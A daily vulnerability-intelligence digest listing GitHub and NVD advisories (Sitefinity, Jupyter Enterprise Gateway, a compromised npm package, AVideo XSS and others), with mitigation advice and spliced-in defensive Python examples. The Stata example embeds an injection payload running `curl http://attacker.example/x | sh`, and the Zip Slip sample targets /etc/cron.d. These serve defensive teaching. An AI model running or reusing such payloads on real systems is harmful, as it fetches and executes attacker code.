📊 2026-06-05 Vulnerability Intelligence Daily · 200 entries · 101 high-severity
Daily vulnerability intelligence digest · 2026-06-05
📊 2026-06-05 Vulnerability Intelligence Daily
📋 200 entries in total
🔥 High/Critical: 101 entries
🐙 GitHub-Advisory: 69 entries (🔥 30 high/critical)
🛡️ NVD-Latest: 71 entries (🔥 71 high/critical)
⚔️ Sploitus: 60 entries
🤖 Today's threat landscape analysis
🎯 Today's priorities
- Multiple critical Progress Sitefinity vulnerabilities (CVE-2026-7312, CVE-2026-7198): CVSS 10.0 and 9.8 respectively. The first is insufficiently protected credentials that let a remote unauthenticated attacker read sensitive information; the second is improper access control that lets a remote unauthenticated attacker take over the system. Several version ranges are affected; check exposure immediately.
- Jupyter Enterprise Gateway template injection and privilege bypass (CVE-2026-44180/1/2): three critical vulnerabilities that chain together. They allow the prohibited-root (UID/GID 0) check to be bypassed when launching kernel containers, arbitrary code execution through Jinja2 template injection in the `KERNEL_*` environment variables, and YAML injection into the generated Kubernetes manifest that can overwrite keys such as the container security context. This is a serious threat to AI/ML infrastructure.
- Supply-chain compromise of @cap-js/openapi (GHSA-jpvj-wpmj-h7rv): a malicious version 1.4.1 was published on May 19; it harvests host credentials and attempts to propagate itself. This is a textbook software supply-chain attack, so every environment that installed the package should be treated as compromised.
- Unauthenticated stored XSS in the AVideo YPTSocket plugin (GHSA-8whc-2wmv-ww35): any unauthenticated user can inject persistent XSS through the `page_title` parameter, leading to hijacked administrator or user sessions and actions performed on their behalf. Every platform running AVideo is affected.
📈 Threat trends
- Remote code execution / command injection (9 items): includes Jupyter Enterprise Gateway SSTI (CVE-2026-44181), docker-wkhtmltopdf-aas OS command injection (CVE-2026-36576), MCP-for-Stata command injection (CVE-2026-47708) and Hugging Face Transformers model-loading RCE (CVE-2026-5241). The attack surface spans developer tooling, container services and AI frameworks.
- Privilege escalation and access-control bypass (4 items): Jupyter Gateway root-restriction bypass (CVE-2026-44180), Masteriyo LMS PRO privilege escalation (CVE-2025-53209) and the Sitefinity access-control flaw (CVE-2026-7198), among others, showing that boundary enforcement between privilege levels remains weak.
- Information disclosure and credential exposure (3 items): CVE-2026-7312 (Sitefinity insufficiently protected credentials), CVE-2026-35075 (hard-coded password in a firmware image) and the Axios proxy-credential leaks (CVE-2026-44486/7). The risk of sensitive-data exposure keeps rising.
- Software supply-chain attacks (1 item): the @cap-js/openapi compromise stands out; attackers are widening their reach by subverting trusted upstream components.
🛡️ Mitigation recommendations
- Patch and isolate now: identify every Progress Sitefinity and Jupyter Enterprise Gateway instance and upgrade it to the fixed release. Take any system that installed @cap-js/openapi@1.4.1 off the network immediately and rotate every credential it could have read.
- Harden input and output handling: for web applications such as AVideo, strictly filter user-supplied parameters like `page_title` and deploy a Content Security Policy (CSP) as a second layer against XSS; validate every parameter that reaches a system command against an allowlist to prevent command injection.
- Audit development and deployment environments: review the Kubernetes manifest templates used by Jupyter Gateway and disable environment-variable injection that is not needed; review AI/ML model-loading paths and do not load models such as LightGlue from untrusted repositories.
- Tighten network and credential policy: update Axios to a fixed release so proxy credentials are no longer leaked; audit firmware for hard-coded passwords and replace them; for Internet-facing CMS deployments such as Sitefinity, enable multi-factor authentication and restrict API access immediately.
🐙 GitHub-Advisory (69 entries)
Critical (6 entries)
- GHSA-8whc-2wmv-ww35 (Critical) - WWBN AVideo: Unauthenticated Stored DOM Cross-Site Scripting via Per-Client Meta
  Unauthenticated Stored DOM XSS via `page_title` Broadcast in AVideo YPTSocket Plugin. Summary: A stored DOM Cross-Site Scripting vulnerability (CWE-79) in…
- GHSA-jpvj-wpmj-h7rv (Critical) - Supply chain compromise via malicious @cap-js/openapi
  Impact: On May 19, 2026, a compromised version of @cap-js/openapi@1.4.1 was published. The malicious packages harvested credentials and attempted…
- CVE-2026-47708 (Critical) - MCP-for-Stata: Command injection via log_file_name parameter in Stata command wr
  Summary: The `log_file_name` parameter in the `stata_do` API and CLI is directly interpolated into a Stata command string without sanitization. The security…
- CVE-2026-44180 (Critical) - Jupyter Enterprise Gateway: ContainerProcessProxy._enforce_prohibited_ids Bypass
  Summary: Jupyter Enterprise Gateway has a prohibited UID and GID feature that by default prevents launching kernels with UID or GID 0 (root). This can be…
- CVE-2026-44181 (Critical) - Jupyter Enterprise Gateway: Jinja2 Template Server Side Template Injection resul
  Summary: The environment variables (`KERNEL_XXX`) used during the rendering of the Kubernetes manifest are vulnerable to Server Side Template Injection (SSTI).…
- CVE-2026-44182 (Critical) - Jupyter Enterprise Gateway: Kubernetes Manifest Injection in Jinja2 Template Ren
  Summary: The environment variables used during the rendering of the Kubernetes manifest allow YAML injection, enabling attackers to overwrite existing keys like…
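The MCP-for-Stata entry above (CVE-2026-47708) and the "validate against an allowlist" recommendation in the mitigation section describe the same fix from two sides. The following is an added example, not MCP-for-Stata's code: the advisory only states that `log_file_name` is interpolated into a Stata command string unsanitized, so the command shape `log using "<name>", replace`, the log directory and the payload are assumptions constructed for illustration. It shows the vulnerable interpolation beside an allowlisted, directory-confined replacement, plus a small detector for the tell-tale signs of an injected command.

```python
"""Allowlist validation for a user-supplied filename that ends up inside a
command string. Added example; command shape, LOG_DIR and the payload are
assumptions, not taken from the MCP-for-Stata advisory."""
import re
from pathlib import Path

# Constructed payload. Stata ends a command at a newline and `!` is its shell
# escape, so a name that smuggles a quote plus a newline gets a second,
# attacker-chosen command run by the same process.
INJECTED_NAME = 'out.log"\n!curl http://attacker.example/x | sh\nlog using "z'

# Allowlist: a plain basename, alphanumeric start, no path separators, no quotes.
NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")
LOG_DIR = Path("/var/lib/stata-logs")  # assumed per-deployment log directory


def build_log_command_unsafe(log_file_name: str) -> str:
    """The vulnerable pattern: raw interpolation, no validation."""
    return f'log using "{log_file_name}", replace'


def is_valid_log_file_name(log_file_name: str) -> bool:
    return NAME_RE.fullmatch(log_file_name) is not None


def validate_log_file_name(log_file_name: str) -> Path:
    """Return the confined absolute path, or raise ValueError."""
    if not is_valid_log_file_name(log_file_name):
        raise ValueError("log_file_name contains characters outside the allowlist")
    # Second layer: even a name that passed the regex must resolve to a direct
    # child of LOG_DIR (guards against future relaxations of NAME_RE).
    target = (LOG_DIR / log_file_name).resolve()
    if target.parent != LOG_DIR.resolve():
        raise ValueError("log_file_name escapes the log directory")
    return target


def build_log_command_safe(log_file_name: str) -> str:
    """Hardened builder: validate first, then interpolate the confined path."""
    target = validate_log_file_name(log_file_name)
    return f'log using "{target}", replace'


def is_injected(command: str) -> bool:
    """Detection heuristic for logs/telemetry: a single `log using` command
    stays on one line and carries exactly one quoted argument."""
    return "\n" in command or command.count('"') != 2


if __name__ == "__main__":
    print(repr(build_log_command_unsafe(INJECTED_NAME)))  # shows the smuggled command
    print(build_log_command_safe("run1.log"))
    try:
        build_log_command_safe(INJECTED_NAME)
    except ValueError as exc:
        print("rejected:", exc)
```

The allowlist is deliberately narrower than "strip the dangerous characters": a denylist has to enumerate every quoting and separator rule of the target interpreter, while an allowlist only has to describe what a log file name legitimately looks like.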
High (24 entries)
- CVE-2026-44486 (High) - Axios: Proxy-Authorization header leaks to redirect target when proxy is re-eval
  Summary: Axios' Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated…
- CVE-2026-44487 (High) - Axios: Proxy-Authorization Credential Leak to Origin Server Across HTTP-to-HTTPS
  Summary: Axios's Node.js HTTP adapter may forward a `Proxy-Authorization` header to a redirected origin during specific proxy-to-direct redirect flows. This…
- CVE-2026-44488 (High) - Allocation of Resources Without Limits or Throttling in Axios
  Summary: Axios versions `1.7.0` through `1.15.x` did not enforce configured request and response size limits when requests were sent with the `fetch`…
- CVE-2026-44496 (High) - Axios: Regular Expression Denial of Service (ReDoS) via Cookie Name Injection
  Summary: Axios versions before `0.32.0` on the `0.x` line and before `1.16.0` on the `1.x` line build a regular expression from the configured XSRF cookie…
- CVE-2026-45337 (High) - Better Auth: Device authorization approve and deny accept any authenticated sess
  Am I affected? You are affected if all of the following are true: you use `better-auth` at a version `>= 1.6.0, < 1.6.11`; the `deviceAuthorization` plugin…
- CVE-2026-45730 (High) - Nuclio: Missing authorization on project write paths allows any authenticated us
  This vulnerability exists in Nuclio Dashboard's project management API, allowing any authenticated user (without membership in the target project) to bypass…
- CVE-2026-34077 (High) - React Router vulnerable to Denial of Service via reflected user input in single
  A DoS vulnerability exists in the React Router v7 [Framework Mode](https://reactrouter.com/start/modes#framework), as well as Remix v2.9.0+ with [Single…
- GHSA-74m6-4hjp-7226 (High) - Klever-Go P2P MultiDataInterceptor leaks global throttler slots on malformed com
  Publisher note: Fixed in `v1.7.17`. Operators running `< v1.7.17` should upgrade. The decompression-error path in…
- CVE-2026-47696 (High) - WWBN AVideo: Authenticated wallet credit bypass in AuthorizeNet processPayment e
  Summary: `plugin/AuthorizeNet/processPayment.json.php` credits the logged-in user's wallet based only on the attacker-controlled `amount` POST parameter. The…
- CVE-2026-49279 (High) - WWBN AVideo: Stored XSS via autoEvalCodeOnHTML Bypass in MessageSQLite WebSocket
  AVideo: Stored XSS via `autoEvalCodeOnHTML` in MessageSQLite WebSocket Handler. Summary: AVideo has a stored XSS vulnerability in the WebSocket messaging…
- CVE-2024-52011 (High) - launch-editor vulnerable to command injection via the crafted request on Windows
  Summary: Due to the insufficient sanitization of the `file` argument in the `launchEditor`, an attacker can execute arbitrary commands on Windows by supplying a…
- CVE-2026-44017 (High) - Docling: Unsafe Zip Extraction in EasyOCR Model Download
  Impact: In versions `< 2.91.0`, the EasyOCR model download functionality extracted ZIP archives without validating member paths, enabling Zip Slip attacks. If…
- CVE-2026-33245 (High) - React Router vulnerable to XSS in unstable RSC redirect handling via javascript:
  When using React Router v7's unstable RSC APIs, there exists a potential client-side XSS issue in the RSC redirect handling if redirects are coming from…
- CVE-2026-41234 (High) - Froxlor: BIND Zone File Injection via TXT Record Content
  Summary: The `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled…
- CVE-2026-42211 (High) - React Router's vendored turbo-stream v2 allows arbitrary constructor invocation
  When using React Router v7 in [Framework Mode](https://reactrouter.com/start/modes#framework), there exists a combination of steps that could potentially allow…
- CVE-2026-42342 (High) - React Router vulnerable to DoS via unbounded path expansion in __manifest endpoi
  There exists a potential DOS attack vector in React Router Framework Mode applications (as well as Remix v2.10.0 - 2.17.4). Certain requests can be crafted to…
- CVE-2026-44016 (High) - Docling: Unsafe Playwright-based HTML Rendering
  Impact: In versions `>= 2.82.0, < 2.91.0`, if the HTML backend was explicitly configured for rendering (the rendering option is deactivated by default), then the…
- CVE-2026-44020 (High) - Docling: Unsafe XML Entity Expansion in USPTO Patent Backend
  Impact: The USPTO patent XML parser used the standard `xml.sax.parseString()` without protection against XML External Entity (XXE) attacks. An attacker could…
- CVE-2026-47214 (High) - Docling: Unsafe URI and Path Handling in HTML Backend
  Impact: The HTML backend did not perform sufficient validation during resource handling: it accepted `file://` URIs enabling local file system access when…
- CVE-2026-44019 (High) - Docling Core: Insufficient validation of image reference URIs
  Impact: In versions `>= 2.5.0, < 2.74.1`, `docling-core` could allow local `file://` image references and accepted inline `data:` content without a…
- CVE-2026-44023 (High) - Docling Core: Unsafe remote filename resolution
  Impact: In versions `>= 1.5.0, < 2.74.1`, `docling-core` did not sufficiently restrict remote request destinations and could resolve a server-provided…
- CVE-2026-49144 (High) - browserstack-runner has an unauthenticated arbitrary file read via path traversa
  Summary: The HTTP server in browserstack-runner serves files from the project directory via the `_default` handler. This handler uses…
- CVE-2026-49143 (High) - browserstack-runner vulnerable to Remote Code Execution via vm sandbox escape in
  Summary: The HTTP handler `/_log` in `lib/server.js` (lines 491–515) of browserstack-runner passes unauthenticated user-supplied data to `vm.runInNewContext()`…
- GHSA-f9rx-7wf7-jr36 / CVE-2023-3173 (High) - Froxlor's API Authentication bypasses 2FA Authentication
  Summary: Froxlor's API authentication (`FroxlorRPC::validateAuth`) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on…
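The Docling entry CVE-2026-44017 above is a Zip Slip: archive members whose names climb out of the extraction directory. The following is an added example, not Docling's code. It builds a small archive in memory (a constructed sample with one benign model file, one `../` member and one absolute-path member), classifies each member before anything is written, and extracts only the members that pass. Note that Python's own `ZipFile.extract` already strips leading separators and `..` components; the check below matters when code opens members with `zf.open()` and writes them to a path it computed itself, which is the pattern that reintroduces the bug.

```python
"""Zip Slip-safe member validation before extraction. Added example; the
archive contents are constructed for the demonstration."""
import io
import tempfile
import zipfile
from pathlib import Path


def build_sample_archive() -> bytes:
    """Constructed sample: a benign file plus two traversal attempts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("model/weights.bin", b"\x00" * 16)
        zf.writestr("../../etc/cron.d/evil", b"* * * * * root id\n")
        zf.writestr("/tmp/abs.txt", b"abs\n")
    return buf.getvalue()


SAMPLE_ARCHIVE = build_sample_archive()


def is_within(dest: Path, target: Path) -> bool:
    try:
        target.relative_to(dest)
        return True
    except ValueError:
        return False


def classify_members(archive: bytes, dest: Path):
    """Return (accepted, rejected) as lists of (member name, reason)."""
    dest = dest.resolve()
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            name = info.filename
            reason = None
            if name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
                reason = "absolute path"
            elif ".." in Path(name).parts:
                reason = "parent traversal"
            elif (info.external_attr >> 16) & 0o170000 == 0o120000:
                # Symlink entries can redirect later members out of dest.
                reason = "symlink entry"
            elif not is_within(dest, (dest / name).resolve()):
                # Last-resort check after resolving the joined path.
                reason = "resolves outside destination"
            (rejected if reason else accepted).append((name, reason))
    return accepted, rejected


def extract_safe(archive: bytes, dest: Path) -> list:
    """Write only validated members, through paths computed from dest."""
    accepted, _ = classify_members(archive, dest)
    dest = dest.resolve()
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name, _ in accepted:
            target = dest / name
            if name.endswith("/"):
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            with zf.open(name) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(name)
    return written


def demo() -> dict:
    """Run the classifier and extractor against a temporary directory."""
    with tempfile.TemporaryDirectory() as d:
        dest = Path(d)
        accepted, rejected = classify_members(SAMPLE_ARCHIVE, dest)
        written = extract_safe(SAMPLE_ARCHIVE, dest)
        return {
            "accepted": [n for n, _ in accepted],
            "rejected": {n: r for n, r in rejected},
            "written": written,
            "size": (dest / "model/weights.bin").stat().st_size,
        }


if __name__ == "__main__":
    print(demo())
```

Rejecting the whole archive on the first bad member is usually the better policy for model downloads: a partially extracted model directory is harder to reason about than a failed download.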
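The two Axios advisories above (CVE-2026-44486 and CVE-2026-44487) and the "update Axios" item in the mitigation section concern the same decision a redirect-following client has to make on every hop: which credential headers still belong on the next request. The following is an added example, not Axios code, written as a network-free policy function so it can be unit-tested. It drops `Proxy-Authorization` whenever the re-evaluated proxy for the new URL is absent or different (the Axios bug class), and drops `Authorization`/`Cookie` on any cross-origin redirect, the long-standing rule for origin credentials. The proxy map shape (scheme-keyed, like the `HTTP_PROXY` environment variables) and the `no_proxy` suffix match are assumptions.

```python
"""Credential-header policy for HTTP redirects. Added example; the proxy
configuration model is an assumption, not Axios's."""
from urllib.parse import urlsplit

ORIGIN_CREDENTIALS = {"authorization", "cookie"}
PROXY_CREDENTIALS = {"proxy-authorization"}


def origin(url: str) -> tuple:
    """(scheme, host, port) with default ports filled in."""
    p = urlsplit(url)
    port = p.port or (443 if p.scheme == "https" else 80)
    return (p.scheme, (p.hostname or "").lower(), port)


def proxy_for(url: str, proxies: dict, no_proxy=()) -> str | None:
    """Re-evaluate the proxy for a URL: a no_proxy suffix wins, otherwise the
    proxy configured for the URL's scheme (None means a direct connection)."""
    p = urlsplit(url)
    host = (p.hostname or "").lower()
    if any(host == h or host.endswith("." + h) for h in no_proxy):
        return None
    return proxies.get(p.scheme)


def _drop(headers: dict, names: set) -> dict:
    return {k: v for k, v in headers.items() if k.lower() not in names}


def headers_for_redirect(headers: dict, from_url: str, to_url: str,
                         proxies: dict, no_proxy=()) -> dict:
    """Headers to send on the redirected request."""
    out = dict(headers)
    # Origin credentials are bound to the origin they were issued for; an
    # http -> https hop on the same host is still a different origin.
    if origin(from_url) != origin(to_url):
        out = _drop(out, ORIGIN_CREDENTIALS)
    # Proxy credentials are bound to the proxy, not the target. If the next
    # hop goes direct, or to a different proxy, the header must not travel
    # along; the new proxy's own userinfo is the source of a fresh header.
    if proxy_for(to_url, proxies, no_proxy) != proxy_for(from_url, proxies, no_proxy) \
            or proxy_for(to_url, proxies, no_proxy) is None:
        out = _drop(out, PROXY_CREDENTIALS)
    return out


if __name__ == "__main__":
    proxies = {"http": "http://user:pw@proxy.internal:3128"}
    h = {"Authorization": "Bearer t", "Cookie": "s=1",
         "Proxy-Authorization": "Basic dXNlcjpwdw==", "Accept": "*/*"}
    # http -> https with no https proxy configured: the hop goes direct.
    print(headers_for_redirect(h, "http://api.example.com/a",
                               "https://api.example.com/a", proxies))
```

For `https` targets reached through a proxy, `Proxy-Authorization` belongs on the `CONNECT` request, never inside the tunnelled request; the same policy applies, only the message it is attached to differs.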
Medium (37 entries)
- CVE-2026-48710 (Medium) - Starlette has missing Host header validation that poisons request.url.path, bypa
  Summary: In affected versions, the HTTP `Host` request header was not validated before being used to reconstruct `request.url`. Because the routing algorithm…
- CVE-2026-44889 (Medium) - WebOb: Location header normalization during redirect leads to open redirect - ag
  Impact: When WebOb normalizes the HTTP Location header to include the request hostname, it does so by parsing the URL that the user is to be redirected to with…
- CVE-2026-44476 (Medium) - Doorkeeper Openid Connect: Dynamic Client Registration feature creates public cl
  Impact: The `DynamicClientRegistrationController#register` action hard-codes `confidential: false` when creating applications…
- CVE-2026-47706 (Medium) - Strawberry GraphQL has a Circular Fragment Reference DOS
  Summary: The QueryDepthLimiter extension is vulnerable to an application-level DoS due to a lack of cycle detection in fragment spreads. When a query contains…
- CVE-2026-47707 (Medium) - Strawberry GraphQL's Bypass of MaxAliasesLimiter via Fragment Spreads leading to
  Summary: The MaxAliasesLimiter extension in Strawberry fails to account for the multiplicative/amplification effect of FragmentSpreadNode. While it correctly…
- CVE-2026-45056 (Medium) - Matrix Rust SDK: Sender-binding gaps in to-device and room-key attribution
  Impact: The `matrix-sdk-crypto` crate before 0.16.1 is missing a check for the sender's user ID when decrypting an Olm-encrypted to-device message containing…
- CVE-2026-45057 (Medium) - matrix-sdk-ui: Incomplete edit validation
  Impact: The message edit validation logic in the `matrix-sdk-ui` crate before 0.16.1 is missing a check: when replacing an encrypted event, the replacement…
- CVE-2026-47215 (Medium) - Singularity: Incorrect path matching for 'limit container paths' directive
  Impact: The `limit container paths` directive in `singularity.conf` is intended to allow a system administrator to limit the paths from which containers can be…
…29 more Medium entries omitted
Low (2 entries)
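The two Strawberry entries above (CVE-2026-47706 and CVE-2026-47707) are two faces of one omission: a limiter that walks fragment definitions one at a time neither notices a spread cycle nor sees how spreads multiply what a single definition declares. The following is an added example, not Strawberry's code. It skips GraphQL parsing and works on a constructed, pre-extracted model (for each fragment: how many aliased fields it declares directly and which fragments it spreads, counted once per spread occurrence across its nested selection sets), which is enough to show both failure modes and the expansion-with-cycle-check that fixes them.

```python
"""Cycle detection and alias amplification across GraphQL fragment spreads.
Added example on a constructed fragment model, not Strawberry's extension."""
from dataclasses import dataclass, field


@dataclass
class Fragment:
    aliases: int                                   # aliased fields declared directly
    spreads: list = field(default_factory=list)    # fragment names, one per spread occurrence


class FragmentCycle(Exception):
    """A fragment (transitively) spreads itself."""


class TooManyAliases(Exception):
    """Fully expanded alias count exceeds the limit."""


def naive_alias_count(fragments: dict) -> int:
    """The bypassed approach: count each definition once, ignore spreads."""
    return sum(f.aliases for f in fragments.values())


def total_aliases(name: str, fragments: dict, _stack=(), _memo=None) -> int:
    """Aliases reached by expanding `name` fully.

    `_stack` holds the current DFS path, so revisiting a name on it is a cycle;
    `_memo` caches finished subtrees so shared fragments (a DAG) are expanded
    once per call tree rather than once per path. Unknown names raise KeyError,
    which a validator should treat as a rejected document."""
    memo = {} if _memo is None else _memo
    if name in memo:
        return memo[name]
    if name in _stack:
        raise FragmentCycle(" -> ".join(_stack + (name,)))
    frag = fragments[name]
    total = frag.aliases + sum(
        total_aliases(child, fragments, _stack + (name,), memo) for child in frag.spreads
    )
    memo[name] = total
    return total


def check_query(operation_aliases: int, operation_spreads: list,
                fragments: dict, max_aliases: int) -> int:
    """Validate an operation: its own aliases plus every spread, expanded."""
    memo = {}
    total = operation_aliases
    for child in operation_spreads:
        total += total_aliases(child, fragments, (), memo)
    if total > max_aliases:
        raise TooManyAliases(f"{total} aliases exceed limit {max_aliases}")
    return total


# Constructed samples.
CYCLIC = {"A": Fragment(1, ["B"]), "B": Fragment(1, ["A"])}
AMPLIFIED = {
    "Leaf": Fragment(10),
    "Mid": Fragment(0, ["Leaf"] * 10),   # ten fields each spreading Leaf
    "Top": Fragment(0, ["Mid"] * 10),    # ten fields each spreading Mid
}

if __name__ == "__main__":
    print("naive count:", naive_alias_count(AMPLIFIED))   # 10
    print("expanded:", total_aliases("Top", AMPLIFIED))    # 1000
    try:
        check_query(0, ["A"], CYCLIC, 100)
    except FragmentCycle as exc:
        print("cycle:", exc)
```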
- CVE-2026-47192 (Low) - kas's late signature validation may allow unnoticed repository manipulations
  Impact: So far, kas checks out and processes repositories regarding configuration includes prior to validating signatures of those repositories. This may allow…
- CVE-2026-48011 (Low) - Shopware: Timing-attack on admin panel allowing enumeration of administrator use
  Summary: There is a Proof of Concept which is able to enumerate the usernames of administrator users. This was possible by performing a timing attack. Details…
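The Shopware entry above (CVE-2026-48011) only says administrator usernames could be enumerated through timing. The following is an added example, not Shopware's code: the leaky function is the usual shape of that bug (return as soon as the user lookup fails, so the expensive password hash only runs for accounts that exist), and the hardened function does the same work on every path by hashing against a dummy record and comparing in constant time. The user store, salt handling and PBKDF2 parameters are constructed for the demonstration.

```python
"""Login check that costs the same whether or not the username exists.
Added example with a constructed user store, not Shopware's code."""
import hashlib
import hmac
import os
import time

ITERATIONS = 100_000  # kept modest so the demo runs quickly


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed store: one admin account hashed at import time.
_SALT = os.urandom(16)
USERS = {"admin": (_SALT, hash_password("correct horse", _SALT))}

# Dummy record with the same cost profile, used whenever the user is unknown.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password(os.urandom(16).hex(), _DUMMY_SALT)


def login_leaky(username: str, password: str) -> bool:
    """Vulnerable pattern: unknown users return in microseconds, known users
    pay for a PBKDF2 run, so response time reveals which names exist."""
    rec = USERS.get(username)
    if rec is None:
        return False
    salt, stored = rec
    return hash_password(password, salt) == stored  # also not constant-time


def login_constant_work(username: str, password: str) -> bool:
    """Hardened: always hash, always compare in constant time, and only then
    decide. The dummy record can never authenticate because of the final
    membership check, which is a dict lookup and not observable at this scale."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = hash_password(password, salt)
    ok = hmac.compare_digest(candidate, stored)
    return ok and username in USERS


def measure(fn, username: str, password: str, rounds: int = 3) -> float:
    """Median wall-clock seconds for fn(username, password)."""
    samples = []
    for _ in range(rounds):
        start = time.perf_counter()
        fn(username, password)
        samples.append(time.perf_counter() - start)
    samples.sort()
    return samples[len(samples) // 2]


if __name__ == "__main__":
    for fn in (login_leaky, login_constant_work):
        known = measure(fn, "admin", "wrong")
        unknown = measure(fn, "nobody", "wrong")
        print(f"{fn.__name__}: known={known:.4f}s unknown={unknown:.4f}s")
```

The remaining gap is the dummy path's salt: it is fixed rather than derived from the username, which is fine as long as the hash cost dominates; a per-request derived salt (for example an HMAC of the username under a server key) removes even that difference.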
🛡️ NVD-Latest (71 entries)
Critical (10 entries)
- CVE-2026-7312 (Critical, CVSS 10.0) - CWE‑522: Insufficiently Protected Credentials in web services in Progress Sitefinity version from 14.0.7700 to 14.4.8152, and 15.0.8200…
- CVE-2025-14771 (Critical, CVSS 9.9) - Files or directories accessible to external parties vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. Product: abb…
- CVE-2026-36576 (Critical, CVSS 9.8) - An OS command injection vulnerability in the app.py component of openlabs docker-wkhtmltopdf-aas up to commit 9f50579 allows attackers…
- CVE-2026-35075 (Critical, CVSS 9.8) - An unauthenticated remote attacker can recover a default, hard coded password from a firmware image and thus gain full access to all…
- CVE-2026-47065 (Critical, CVSS 9.8) - ZDRES-232: resolveProxyClass Not Overridden - acceptMatchers Filter Bypass via java.lang.reflect.Proxy. Assessment: Fully addressed.…
- CVE-2026-7198 (Critical, CVSS 9.8) - CWE-284: Improper Access Control in web services in Progress Sitefinity 15.4.8623 before 15.4.8630 allows a remote unauthenticated…
- CVE-2025-53209 (Critical, CVSS 9.8) - Incorrect Privilege Assignment vulnerability in Themeisle Masteriyo LMS PRO allows Privilege Escalation. This issue affects Masteriyo…
- CVE-2026-5241 (Critical, CVSS 9.6) - A vulnerability in the LightGlue model loading path of huggingface/transformers version 5.2.0 allows an attacker-controlled model…
- CVE-2026-42684 (Critical, CVSS 9.3) - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ahmad WP Job Portal allows Blind…
- CVE-2026-36748 (Critical, CVSS 9.0) - RockRMS v16.13 and before v.17.7.0 is vulnerable to Cross Site Scripting (XSS) via Social Media links in user profile.
High (61 entries)
- CVE-2026-36608 (High, CVSS 8.8) - Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows UPnP AddPortMapping to forward external ports to the router's…
- CVE-2026-36607 (High, CVSS 8.8) - Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows unauthenticated brute-force attacks via the TDDP password change…
- CVE-2026-35085 (High, CVSS 8.8) - A remote attacker with user privileges can exploit a stack buffer overflow in gdv-serverconfig to gain full system access as root.
- CVE-2026-35084 (High, CVSS 8.8) - A remote attacker with user privileges can exploit a stack buffer overflow in dali-devconfig to gain full system access as root.
- CVE-2026-35083 (High, CVSS 8.8) - A remote attacker with user privileges can exploit a stack buffer overflow to gain full system access as root.
- CVE-2026-35082 (High, CVSS 8.8) - The ugw-logread method allows a remote attacker with user privileges to access arbitrary local files due to insufficient validation of…
- CVE-2025-15656 (High, CVSS 8.8) - Incorrect Privilege Assignment vulnerability in Mojoomla School Management allows Privilege Escalation. This issue affects School…
- CVE-2025-14772 (High, CVSS 8.8) - Authorization bypass through User-Controlled key vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. Product: abb…
- CVE-2026-30652 (High, CVSS 8.8) - A remote buffer overflow vulnerability exists in the /cgi-bin/dido/setdo.cgi endpoint of the admin interface of Vivotek FD8136 cameras…
- CVE-2026-30650 (High, CVSS 8.8) - A post-authentication remote buffer overflow vulnerability exists in the /cgi-bin/admin/eventtask.cgi endpoint of the admin interface…
- CVE-2026-10591 (High, CVSS 8.8) - Insufficient access control restrictions in the file write tool in Amazon Kiro IDE before version 0.11 might allow remote…
- CVE-2026-7201 (High, CVSS 8.8) - CWE-639: Authorization Bypass Through User-Controlled Key in web services in Progress Sitefinity 15.2.x before 15.2.8441, 15.3.x before…
- CVE-2026-7195 (High, CVSS 8.8) - CWE-20: Improper Input Validation in web services in Progress Sitefinity 14.1.x through 14.3.x, 14.4.x before 14.4.8152, 15.0.x before…
- CVE-2025-53345 (High, CVSS 8.8) - Missing Authorization vulnerability leading to code execution after installing malicious vulnerable plugin in ThimPress Thim Core. This…
- CVE-2026-7313 (High, CVSS 8.7) - CWE‑522: Insufficiently Protected Credentials in web services in Progress Sitefinity version from 8.0.5700 to 13.3.7652 allows a remote…
- CVE-2026-20230 (High, CVSS 8.6) - A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management…
- CVE-2019-25719 (High, CVSS 8.6) - Dräger Infinity Acute Care System and Standalone Infinity M540 patient monitors running software versions VG4.1.1, VG4.0.3, and lower…
- CVE-2026-10622 (High, CVSS 8.2) - Improper Authentication in REST API in Collibra Agent, allows a remote unauthenticated attacker to access privileged functionality via…
- CVE-2026-35081 (High, CVSS 8.1) - The ugw-logstop method allows a remote attacker with user privileges to terminate arbitrary processes due to insufficient validation of…
- CVE-2026-35080 (High, CVSS 8.1) - The ugw-restoreinfo method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation…
- CVE-2026-35079 (High, CVSS 8.1) - The ugw-restore method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of…
- CVE-2026-35078 (High, CVSS 8.1) - The ugw-logstop method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of…
- CVE-2026-35077 (High, CVSS 8.1) - The ugw-delete-file method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient…
- CVE-2026-35076 (High, CVSS 8.1) - The bac-scanresult method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation…
- CVE-2026-39555 (High, CVSS 8.1) - Deserialization of Untrusted Data vulnerability in Elated-Themes Askka allows Object Injection. This issue affects Askka: from n/a…
- CVE-2026-39553 (High, CVSS 8.1) - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes…
- CVE-2026-39552 (High, CVSS 8.1) - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Code Supply…
